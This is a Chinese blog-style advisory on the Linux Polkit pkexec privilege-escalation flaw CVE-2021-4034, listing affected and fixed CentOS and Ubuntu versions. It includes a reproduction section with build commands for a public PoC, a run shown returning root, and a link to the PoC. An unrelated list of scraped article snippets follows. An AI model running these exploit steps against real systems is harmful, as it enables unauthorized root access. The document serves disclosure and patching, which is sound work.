Linux Polkit本地权限提升漏洞(CVE-2021-4034)
漏洞描述
Polkit是用于在Linux操作系统中控制系统范围特权的组件。它为非特权进程提供了与特权进程进行通信的有组织的方式。类似“sudo”的用法。
CVE-2021-4034
polkit的pkexec存在本地权限提升漏洞,已获得普通权限的攻击者可通过此漏洞获取root权限。
该漏洞CVSS评分:7.8,
危害等级:高危漏洞利用难度低,最早引入问题的commit来自2009年,影响版本范围远超去年的sudo漏洞。漏洞作者在Ubuntu、Debian、Fedora和CentOS的默认安装环境上均测试通过。
影响范围
影响版本:由于polkit为系统预装工具,目前主流Linux版本均受影响。
修复版本:
CentOS系列:
CentOS 6:polkit-0.96-11.el6_10.2
CentOS 7:polkit-0.112-26.el7_9.1
CentOS 8.0:polkit-0.115-13.el8_5.1
CentOS 8.2:polkit-0.115-11.el8_2.2
CentOS 8.4:polkit-0.115-11.el8_4.2
Ubuntu系列:
Ubuntu 20.04 LTS:policykit-1 - 0.105-26ubuntu1.2
Ubuntu 18.04 LTS:policykit-1 - 0.105-20ubuntu0.18.04.6
Ubuntu 16.04 ESM:policykit-1 - 0.10514.1ubuntu0.5+esm1
Ubuntu 14.04 ESM:policykit-1 - 0.105-4ubuntu3.14.04.6+esm1
漏洞复现
下载poc,进入poc目录,编译,运行。
vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo “module UTF-8// PWNKIT// pwnkit 1” > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
whoami
root
exit
poc地址
https://github.com/berdav/CVE-2021-4034
修复建议
参考漏洞影响范围,及时升级至最新安全版本。
总结和参考
1、及时安装安全软件,关闭不需要的服务和端口。
2、开启系统防火墙。
3、及时升级系统或者软件的版本。
Linux Polkit本地权限提升漏洞(CVE-2021-4034)相关推荐
- Linux Polkit 中的pkexec 组件存在的本地权限提升漏洞(CVE-2021-4034)修复方法及centos6和centos7的安装包
近日安全监测发现Linux Polkit 中的pkexec 组件存在的本地权限提升漏洞(CVE-2021-4034),pkexec应用程序为 Linux 系统预装工具,漏洞影响Ubuntu.Debia ...
- CVE-2021-33909:Linux本地权限提升漏洞
Linux本地权限提升漏洞影响大多数Linux发行版. 漏洞概述 Qualys研究人员在Linux kernel中发现一个本地权限提升漏洞--Sequoia,该漏洞是Linux kernel文件系统层 ...
- Linux Kernel ‘CLONE_NEWUSER|CLONE_FS’本地权限提升漏洞
漏洞名称: Linux Kernel 'CLONE_NEWUSER|CLONE_FS'本地权限提升漏洞 CNNVD编号: CNNVD-201303-281 发布时间: 2013-03-15 更新时间: ...
- CentOS升级polkit版本,解决 Linux Polkit 存在权限提升的漏洞 (CVE-2021-4034)
CentOS升级polkit版本 漏洞描述 影响范围 参考安全版本 演示环境检查 离线升级操作 在线升级操作 漏洞描述 受影响版本的 pkexec 无法正确处理调用参数计数,最终尝试将环境变量作为命令 ...
- linux系统中acpid的作用,ACPID电源按钮事件本地权限提升漏洞
发布日期:2011-12-08 更新日期:2012-08-21 受影响系统: acpid acpid 2.0.10 acpid acpid 1.0.8 acpid acpid 1.0.3 acpid ...
- MICROSOFT TEAMS MACOS版本本地权限提升漏洞
Offensive Security安全研究人员在Microsoft Teams的XPC 服务中发现了一个安全漏洞,并将漏洞报告给了MSRC,微软确认了该漏洞但决定不立即修复. 漏洞根源分析 漏洞是两 ...
- linux 修改驱动权限,Linux Kernel 'MSR' 驱动程序本地权限提升漏洞
发布日期:2013-02-07 更新日期:2013-03-05 受影响系统: Linux kernel 2.6.x 描述: -------------------------------------- ...
- linux内核安全数据,【漏洞分析】Linux内核XFRM权限提升漏洞分析预警(CVE–2017–16939)...
0x00 背景介绍 2017年11月24日, OSS社区披露了一个由独立安全研究员Mohamed Ghannam发现的一处存在于Linux 内核Netlink socket子系统(XFRM)的漏洞,漏 ...
- Polkit权限提升漏洞(CVE-2021-4034)利用及修复
Polkit本地权限提升漏洞(CVE-2021-4034)利用及修复 文章目录 Polkit本地权限提升漏洞(CVE-2021-4034)利用及修复 漏洞说明 危害等级 影响版本 修复版本 漏洞利用 ...
最新文章
- 机器学习的门槛再度降低,AI小白如何用5分钟搞定建模?
- 普元eos开发手册_名词解释--统一应用(开发)平台Unified Application Platform
- ue查找多个关键字_聊聊数据库GROUP BY关键字的那些事
- 【深度学习】深入浅出神经网络框架的模型元件(池化、正则化和反卷积层)
- 白话设计模式——目录
- 【大数据、数据挖掘、数据分析】用户画像是什么?如何制作用户画像?
- linux三剑客试题,linux三剑客-awk
- spring mvc4 笔记
- 算法学习:最近公共祖先
- Day 16 包 json模块和os模块
- Java核心类库篇4——集合
- 01【C3D 行为识别】项目下载 环境配置 数据集转化视频帧 UCF101数据集处理
- ps中基色 混合色 结果色是什么
- 用好这 42 款 Chrome 插件,每年轻松省出一个年假
- 原生javascript-图片爆炸的效果
- 退出计算机用户的快捷方式,如何注销计算机或从Windows 10注销
- 本题要求实现一个函数,输出n行空心的数字金字塔。
- Origin Pro2017使用PatchOriginPro.exe破解提示Patch unsuccessfully or already
- 小米诚意之作:骁龙8Gen1+IMX766+OIS+120Hz,已跌至两千元档
- Surface RT2使用情况
热门文章
- 智掌柜带你了解餐饮点菜系统的功能,快来看看吧~
- linux需要wifi网络认证,无线802.1x认证简介及配置方法
- vsphere之vmotion精华
- Android开发高手课笔记 - 01 崩溃优化(上):关于“崩溃”那点事
- 无法访问计算机请检查名称的拼写,Win7系统访问共享文件夹提示“请检查名称的拼写”的解决方法...
- 拯救者Y7000关闭的流程
- java计算机毕业设计新疆旅游专列订票系统源码+mysql数据库+lw文档+系统+调试部署
- 服务器无法显示url,遇到“您所请求的网址(URL)无法获取”的解决办法
- 专访民生银行:CPOS平台如何从线下布局移动支付
- Ruby使用RabbitMQ(基础)